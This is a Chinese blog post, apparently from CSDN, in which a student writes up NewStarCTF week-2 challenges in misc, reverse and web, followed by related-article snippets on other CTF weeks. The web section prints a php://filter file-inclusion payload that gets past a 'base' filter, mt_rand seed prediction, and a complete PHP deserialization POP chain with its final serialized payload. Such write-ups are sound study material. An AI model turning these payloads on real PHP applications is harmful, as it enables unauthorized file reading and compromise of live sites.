NewStarCTF 公开赛赛道 第二周学习记录

最新推荐文章于 2024-10-22 17:20:46 发布
最新推荐文章于 2024-10-22 17:20:46 发布
阅读量2.5k 收藏 6
点赞数 1
分类专栏: CTF 文章标签: 学习 php 经验分享 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64815693/article/details/127116807
版权

额。。又是我哦,这次难度对于我来说有点高,一共就做出来这几个,属实有点少,作为菜鸡的我来给大家讲讲我的思路。。。。

CRYPTO

一个还没做出来,还正在研究

MISC

Yesec no drumsticks 2

感觉这个内容已经有点提示的味道了,内心莫,肯定是藏在你看不到的地方。

我怀疑这个出题人是写小说的,这么会写,不过像这种没有什么东西,可以尝试空白符,空白符解密

 这不就来了吗,base64解密得到flag

Coldwinds's Desktop

给了一个文件夹里面都是这种碎片,应该是拼图,先看看有多少张小图片,我算了一下,114张,每张小图片的像素为30*30,下面有用。

把文件夹放到kali中,需要

没有的这个命令的自己下
apt-get install graphicsmagick-imagemagick-compat


要到有小碎片的目录下面*.PNG代表当前目录中所有PNG图片,12x12用到了,就是有144个小图片,生成图片交flag.png
montage *.PNG -tile 12x12 -geometry +0+0 flag.png

接下来就可以在这个目录中找到生成的图片了

移到桌面吧,不容易出错

接下来用到gaps命令,没有自己下

git clone https://github.com/nemanja-m/gaps.git #gaps官网
cd gaps
pip install -r requirements.txt
sudo apt-get install python-tk
pip install -e .

pip install -r requirements.txt这一步经常有人出错,给大家总结一下原因

1.没有这些模块,numpy 、opencv-python 、matplotlib 、pytest 、 pillow需要大家自己下

2.requirements.txt中对应的版本不对

解决:

哪些模块吗,自己下一下,用pip下载就行

版本号一定要很详细,使用命令pip list查看自己模块的版本
在vim requirements.txt修改版本号就行了

这是我的版本,大家不要和抄我的,要看自己的版本。。。。。

命令这么用

gaps --image=flag.png --size=30 --population=144 --generations=64 --save
flag.png一定要在当前目录下面,30用到了,代表每一个小碎片的大小,144是代表有144个小图片,64那个不用管自己可以随便改的,--save恢复

 

这是我的图片还不是很明显,大家可以改那个64来获取不同的图片,来补满自己的flag就行了

REVERSE

前可见古人,后得见来者

就会这一个。。。。。。

32位的,没有壳

这里提醒大家这个是用,ida7.7版本的,不同版本看到的东西不一样。。。。。。。。

接下来用32位打开

先找main函数

 shift+F12先看一下

这里好像有关于flag的信息,去看一下

 随便点两下,然后来到这

按F5

这是他的一个运行,我们找一下他的加密在哪

sub_4113DE点进去再点进去

 我们知道这里加密有两个for,而且这两个for是在相同级别的,所以上面那个for太麻烦了,我们看下嘛这个他进行了一个异或的操作和0x22这u应该没关系

我们找一下密文进行操作一下

 

这里还有点a,得到完整的密文

shift+e提取出来

浅浅解一下

 这一串熟不熟悉,rot13就行或者凯撒也行

WEB

Word-For-You(2 Gen)

sqlmap一把梭,欧克欧克

IncludeOne

我感觉这个挺简单的其实,还给了工具

先看代码

 <?php
highlight_file(__FILE__);
error_reporting(0);
include("seed.php");
//mt_srand(*********);
echo "Hint: ".mt_rand()."<br>";
if(isset($_POST['guess']) && md5($_POST['guess']) === md5(mt_rand())){
    if(!preg_match("/base|\.\./i",$_GET['file']) && preg_match("/NewStar/i",$_GET['file']) && isset($_GET['file'])){
        //flag in `flag.php`
        include($_GET['file']);
    }else{
        echo "Baby Hacker?";
    }
}else{
    echo "No Hacker!";
} Hint: 1219893521
No Hacker!

 获取种子,来找下一个随机值

 

 像这样都试试莫

得到了1202031004,post传就行

看看下一个

 if(!preg_match("/base|\.\./i",$_GET['file']) && preg_match("/NewStar/i",$_GET['file']) && isset($_GET['file']))

过滤了base,必须有NewStar,file不能为空

挺简单的

PHP://filter/read=string.rot13|NewStar|/resource=flag.php

 然后看源代码

得到flag,需要rot13解密

UnserializeOne

代码:

<?php
error_reporting(0);
highlight_file(__FILE__);
#Something useful for you : https://zhuanlan.zhihu.com/p/377676274
class Start{
    public $name;
    protected $func;

    public function __destruct()
    {
        echo "Welcome to NewStarCTF, ".$this->name;
    }

    public function __isset($var)
    {
        ($this->func)();
    }
}

class Sec{
    private $obj;
    private $var;

    public function __toString()
    {
        $this->obj->check($this->var);
        return "CTFers";
    }

    public function __invoke()
    {
        echo file_get_contents('/flag');
    }
}

class Easy{
    public $cla;

    public function __call($fun, $var)
    {
        $this->cla = clone $var[0];
    }
}

class eeee{
    public $obj;

    public function __clone()
    {
        if(isset($this->obj->cmd)){
            echo "success";
        }
    }
}

if(isset($_POST['pop'])){
    unserialize($_POST['pop']);
}

我的思路是Start的__destruct()调用Sec的__toString(),__toString()调用Easy的__call(),__call()复制调用eeee的__clone(),__clone()的isset调用Start的__isset,__isset调用Sec的__invoke获取flag

这么写

<?php

class Start
{
    public $name;
    public $func;

    public function __destruct()
    {
        echo "Welcome to NewStarCTF, ".$this->name;
    }

    public function __isset($var)
    {
        ($this->func)();
    }
}

class Sec
{
    public $obj;
    public $var;
    public function __construct($a, $b)
    {
        $this->obj=$a;
        $this->var=$b;
    }
    public function __toString()
    {
        $this->obj->check($this->var);
        return "CTFers";
    }

    public function __invoke()
    {
        echo "afdfdsaf";
    }
}

class Easy
{
    public $cla;
    public function __call($fun, $var)
    {
        echo $this->cla = clone $var[0];
    }
}

class eeee
{
    public $obj;

    public function __clone()
    {
        if (isset($this->obj->cmd)) {
            echo "success";
        }
    }
}
$a=new Start();

$b=new Easy();
$c=new eeee();

$c->obj=$a;
$d=new Sec($b, $c);

$a->name=$d;
$a->func=$d;

echo serialize($a);

 

我这里设置了一个这个,只要到这输出了这一串,就肯定可以执行那个

payload: pop=O:5:"Start":2:{s:4:"name";O:3:"Sec":2:{s:3:"obj";O:4:"Easy":1:{s:3:"cla";N;}s:3:"var";O:4:"eeee":1:{s:3:"obj";r:1;}}s:4:"func";r:2;}

 

NewStarCTF 2024 公开赛道 Week1
2401_85238540的博客
07-20 1926
使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag。
NewStarCTF 2023 公开赛道 orw&rop
qq_60209620的博客
04-12 500
程序mmap了一段地址,权限是7,也就是可读可写可执行,我们把orw布置到这里就行啦,然后控制程序执行流(也就是rip指针)到这里就行啦。第一次输入,有格式化字符串漏洞,利用他来泄露libc基址(通过libc_start_main),和canary,方便后面利用栈溢出漏洞。第二次输入存在栈溢出漏洞,我们需要把orw的shellcode写进mmap的地址,那么我们就需要一个read函数,所以栈溢出就是去执行我们写的read函数,把读orw写进target addr。
BUUCTF NewStarCTF 公开赛赛道Week2 Writeup
末初 · mochu7
10-03 2646
BUUCTF NewStarCTF 公开赛赛道Week2 Writeup
NewStarCTF 公开赛赛道week2 web writeup
your_friends的博客
10-02 858
利用mt_srand是伪随机数用它给出的Hint到php_mt_seed里面直接跑。如果我们post提交了一个data那么他就不会执行后面的文件从而执行我们自己的输入。由Easy::__call方法进入eeee::__clone。进入__invoke需要调用到Start::__isset。上周做题被这道sql注入整感动了,这次增加难度又来了。由Sec::__tostring进入__call方法。最终调用点在Sec::__invoke。发现我们直接在页面查询是输入了一个id。虽然加了点难度,但是还是挺简单。
NewStarCTFWEEK2 pwn题解
m0_51251108的博客
09-27 814
NewStarCTFWEEK2uint32 and ret:shellcode-revenge:砍一刀:buffer-fly uint32 and ret: 就是个负数转无符号会变为一个很大的数,就能溢出,然后太大也不行read不了,找一下64位无符号int是多少,然后对应减掉一点,用gdb调试一下就知道了,还有就是用ret调一下 from pwn import * local_file = './uint' local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
NewStarCTF 2023 Week1 web官方wp
m0_63641882的博客
10-04 899
进入题目首先要求以GET方式传参:http://ec7fe482-428e-4978-8b2c-4016472b07a7.node4.buuoj.cn:81/index.php?ctf=ok接着要求以POST方式传递secret参数,并且secret参数的值是固定的: 右键查看页面源代码可以看到base64编码后的secret值: base64解码得到 使用HackBar发送secret: 添加X-Real-IP头,
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 2109
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn。
NewStarCTF 2023 公开赛道 Week1(1),View的这些基础知识你必须要知道
04-08 905
c = pow(m,e,n) print(n) print©使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag from secret import flag from Crypto.Util.number import *p = getPrime(1024) q = getPrime(1024)d = getPrime(32) e = inverse(d, (p-1)*(q-1)) n = p*q m = bytes_to_long(flag)c = po
2023NewStarCTF [WEB] week4 逃 字符串逃逸
2301_76690905的博客
10-29 395
第一种:还是同样的思路把最后的cmd排挤出去,用我们自己构建的cmd属性,但是这里问题就来了,我当时鼠标点错修改的是最后一个cmd,但是居然也出了flag,理论上这里已经被截断了呀。而且我定睛一看发现我刚刚的ls /也是这么来的,理论上key的长度不对应该什么都出不了。我们的思路就是把多出来的字符构造成功能性代码(即自己构造一个cmd属性),原本的功能性代码就不管了(不管给原本的cmd赋值什么都不重要了,因为我们已经自己动手构造cmd属性了,而原本的cmd会被废弃)的时候就会默认结束,意味着什么呢?
Newstarctf week5逆向wp
weixin_66718841的博客
10-24 1224
NewStarCTF的week5逆向wp
NewStarCTF week2 部分题解
Aiwin的博客
09-29 4157
NewStarCTF week2 尽力的某些题解
NewStarCTF2024-week1-wp
2303_79553403的博客
10-07 2307
原文链接:https://www.n0o0b.com/archives/newstarctf2024-week1-wp。
NewStarCTF 2022 web方向题解 wp
Jay17的博客
08-29 3089
NewStarCTF 2022 web方向题解 wp
NewStarCTF week5 web 部分题解
qq_60829702的博客
10-23 679
[NewStarCTF] Give me your photo PLZ、Unsafe Apache、So Baby RCE Again、BabySSTI_Three解题记录以及心得体会
NewStarCTF 2023 WEEK1 Crypto
qq_63577068的博客
10-02 729
key=16*8*2=256bit,iv=16*8=128bit,256^128bit说明key的高位128bit不变,所以通过xor高128bit得到高位key的值*2还原key,iv=key^xor^1。每一个明文异或key,得到密文。最主要是要知道key值,就能逆推明文,一种就是,已知明文头是“flag”,用0xe9^ord("f"),0xe3^ord("l")得到key=143。凯撒密码,已知flag的头,kqfl->flag 相当于向前移动5位,key=5,得到。Brainfuck解密。
NewStarCTF 2024 公开赛道 Week1,2024年最新已整理成文档
2401_83947398的博客
04-18 1075
首先要通过Level 1 ,发现它是PHP的弱类型比较,只要两个数的md5加密后的值以0e开头就可以绕过,因为php在进行弱类型比较(即==)时,会先转换字符串的类型,再进行比较,而在比较时因为两个数都是以0e开头会被认为是科学计数法,0e后面加任何数在科学计数法中都是0,所以两数相等。文件头错误了,把它改正回来,文件为也要是504B,之后,把后缀改为.zip,解压后获得另外一个压缩包flag.zip。使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag。
[NewStarCTF 2023] web题解
热门推荐
rev1ve的博客
10-16 1万+
分析一下,第一个if语句判断条件为上传的password参数的MD5值前六位为c4d038;和反引号去绕过对system函数的过滤,反斜杠绕过flag,tac替换cat命令。(多次尝试,发现回显的位置在5而不是1,开始卡了很久没回显)简单的文件包含,这里过滤了常见的转换过滤器base和rot。打开题目,发现是小游戏(题目跟最近打的SHCTF比较像)我们丢到重放器,发现是页面302状态,并且出现了提示。(这里用XFF不行,我用的是X-Real-IP)打开题目,提示我们传参两个数,然后帮我们计算。
NewStarCTF 2024第一第二周部分wp
2301_79704829的博客
10-22 2870
2024NewStarCTF 第一第二周wp
BUUCTF NewStarCTF 公开赛赛道Week3 Writeup
末初 · mochu7
10-09 6058
BUUCTF NewStarCTF 公开赛赛道Week3 Writeup
[NewStarCTF 公开赛赛道]RSA_begin
最新发布
03-16
### 关于 NewStarCTF 公开赛 RSA_begin 的解题思路 #### 背景介绍 RSA 是一种基于大整数分解困难性的公钥加密算法。其核心在于通过两个大素数 \( p \) 和 \( q \),计算模数 \( n = p \times q \),并利用欧拉函数 \( \phi(n) = (p-1)(q-1) \) 来生成私钥 \( d \)[^1]。 在题目中已知参数如下: - \( p = 473398607161 \) - \( q = 4511491 \) - \( e = 17 \) 目标是求解私钥 \( d \),满足条件 \( e \cdot d \equiv 1 \ (\text{mod} \ \phi(n)) \)。 --- #### 计算过程详解 ##### 1. 计算模数 \( n \) 根据定义,\( n = p \times q \)。因此, \[ n = 473398607161 \times 4511491 = 2136002117282111. \] ##### 2. 计算欧拉函数 \( \phi(n) \) 由公式 \( \phi(n) = (p-1)(q-1) \),可得: \[ \phi(n) = (473398607161 - 1) \times (4511491 - 1) = 473398607160 \times 4511490 = 2135550968666920. \] ##### 3. 扩展欧几里得算法求逆元 \( d \) 为了找到 \( d \),需满足 \( e \cdot d \equiv 1 \ (\text{mod} \ \phi(n)) \)。这可以通过扩展欧几里得算法实现: 给定 \( a = e = 17 \), \( b = \phi(n) = 2135550968666920 \),执行扩展欧几里得算法得到 \( x \)(即 \( d \)),使得 \( ax + by = \gcd(a, b) \) 成立。 以下是 Python 实现代码: ```python def egcd(a, b): if a == 0: return (b, 0, 1) gcd, x1, y1 = egcd(b % a, a) x = y1 - (b // a) * x1 y = x1 return gcd, x, y def mod_inverse(e, phi_n): _, x, _ = egcd(e, phi_n) return x % phi_n # 已知参数 e = 17 phi_n = 2135550968666920 # 求解 d d = mod_inverse(e, phi_n) print(d) ``` 运行上述代码可以得出结果: \[ d = 125714762862169. \] --- #### 提交 Flag 最终将 \( d \) 值作为 flag 提交即可。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值